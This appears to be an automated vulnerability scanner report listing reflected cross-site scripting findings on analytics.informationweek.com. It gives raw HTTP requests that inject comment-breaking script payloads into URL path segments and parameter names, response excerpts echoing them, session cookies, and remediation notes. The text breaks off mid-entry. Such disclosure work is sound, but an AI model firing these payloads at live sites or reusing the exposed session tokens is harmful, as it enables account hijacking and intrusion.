GET /menu/14/Regulatory-compliance99475--><script>alert(1)</script>1d835a1e36b/Regulatory-compliance.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:42 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:42 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... pliance99475--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E1d835a1e36b%2FRegulatory-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/14/Regulatory-compliance99475--><script>alert(1)</script>1d835a1e36b/Regulatory-compliance.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload d29e4--><script>alert(1)</script>8dfe7f79a8e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/14/Regulatory-compliance/Regulatory-compliance.htmld29e4--><script>alert(1)</script>8dfe7f79a8e HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:51 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:51 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ance.htmld29e4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8dfe7f79a8e&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.htmld29e4--><script>alert(1)</script>8dfe7f79a8e"> ...[SNIP]...
3.75. http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cb493--><script>alert(1)</script>3a29ce36218 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/14/Regulatory-compliance/Regulatory-compliance.html?cb493--><script>alert(1)</script>3a29ce36218=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... l%3Fcb493--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3a29ce36218%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html?cb493--><script>alert(1)</script>3a29ce36218=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 3b017--><script>alert(1)</script>b342dbc4ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu3b017--><script>alert(1)</script>b342dbc4ff/15/Risk-management/Risk-management.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:16 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:16 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nweek.com%2Fmenu3b017--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb342dbc4ff%2F15%2FRisk-management%2FRisk-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu3b017--><script>alert(1)</script>b342dbc4ff/15/Risk-management/Risk-management.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 68690--><script>alert(1)</script>5ec01a42a8e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1568690--><script>alert(1)</script>5ec01a42a8e/Risk-management/Risk-management.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:29 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:29 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... k.com%2Fmenu%2F1568690--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E5ec01a42a8e%2FRisk-management%2FRisk-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1568690--><script>alert(1)</script>5ec01a42a8e/Risk-management/Risk-management.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload f21aa--><script>alert(1)</script>0b84347c146 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/15/Risk-managementf21aa--><script>alert(1)</script>0b84347c146/Risk-management.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:38 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:38 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 5%2FRisk-managementf21aa--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0b84347c146%2FRisk-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/15/Risk-managementf21aa--><script>alert(1)</script>0b84347c146/Risk-management.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 379d3--><script>alert(1)</script>d2d0dc344c3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/15/Risk-management/Risk-management.html379d3--><script>alert(1)</script>d2d0dc344c3 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:49 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:49 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... FRisk-management.html379d3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed2d0dc344c3&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html379d3--><script>alert(1)</script>d2d0dc344c3"> ...[SNIP]...
3.80. http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/15/Risk-management/Risk-management.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a2d82--><script>alert(1)</script>67632b3f5b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/15/Risk-management/Risk-management.html?a2d82--><script>alert(1)</script>67632b3f5b1=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nagement.html%3Fa2d82--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E67632b3f5b1%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html?a2d82--><script>alert(1)</script>67632b3f5b1=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload a149b--><script>alert(1)</script>3766ebdc316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menua149b--><script>alert(1)</script>3766ebdc316/18/Mobile-and-wireless/Mobile-wireless.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:07 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:07 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... .com%2Fmenua149b--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3766ebdc316%2F18%2FMobile-and-wireless%2FMobile-wireless.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menua149b--><script>alert(1)</script>3766ebdc316/18/Mobile-and-wireless/Mobile-wireless.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload bab5e--><script>alert(1)</script>91f10c172cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/18bab5e--><script>alert(1)</script>91f10c172cc/Mobile-and-wireless/Mobile-wireless.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:17 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:18 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... m%2Fmenu%2F18bab5e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E91f10c172cc%2FMobile-and-wireless%2FMobile-wireless.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18bab5e--><script>alert(1)</script>91f10c172cc/Mobile-and-wireless/Mobile-wireless.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 19ada--><script>alert(1)</script>95f6d47511 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/18/Mobile-and-wireless19ada--><script>alert(1)</script>95f6d47511/Mobile-wireless.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:30 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ile-and-wireless19ada--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E95f6d47511%2FMobile-wireless.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18/Mobile-and-wireless19ada--><script>alert(1)</script>95f6d47511/Mobile-wireless.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload e225f--><script>alert(1)</script>8515afb1e2e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/18/Mobile-and-wireless/Mobile-wireless.htmle225f--><script>alert(1)</script>8515afb1e2e HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:46 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:46 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45935
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ile-wireless.htmle225f--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8515afb1e2e&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.htmle225f--><script>alert(1)</script>8515afb1e2e"> ...[SNIP]...
3.85. http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/18/Mobile-and-wireless/Mobile-wireless.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 552fb--><script>alert(1)</script>73854b4e76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/18/Mobile-and-wireless/Mobile-wireless.html?552fb--><script>alert(1)</script>73854b4e76=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... eless.html%3F552fb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E73854b4e76%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/18/Mobile-and-wireless/Mobile-wireless.html?552fb--><script>alert(1)</script>73854b4e76=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload bb584--><script>alert(1)</script>60dd04d670d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menubb584--><script>alert(1)</script>60dd04d670d/19/Network-infrastructure/Network-infrastructure.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:15 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:15 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ubb584--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E60dd04d670d%2F19%2FNetwork-infrastructure%2FNetwork-infrastructure.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menubb584--><script>alert(1)</script>60dd04d670d/19/Network-infrastructure/Network-infrastructure.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload aea57--><script>alert(1)</script>9b59d6056e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/19aea57--><script>alert(1)</script>9b59d6056e2/Network-infrastructure/Network-infrastructure.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
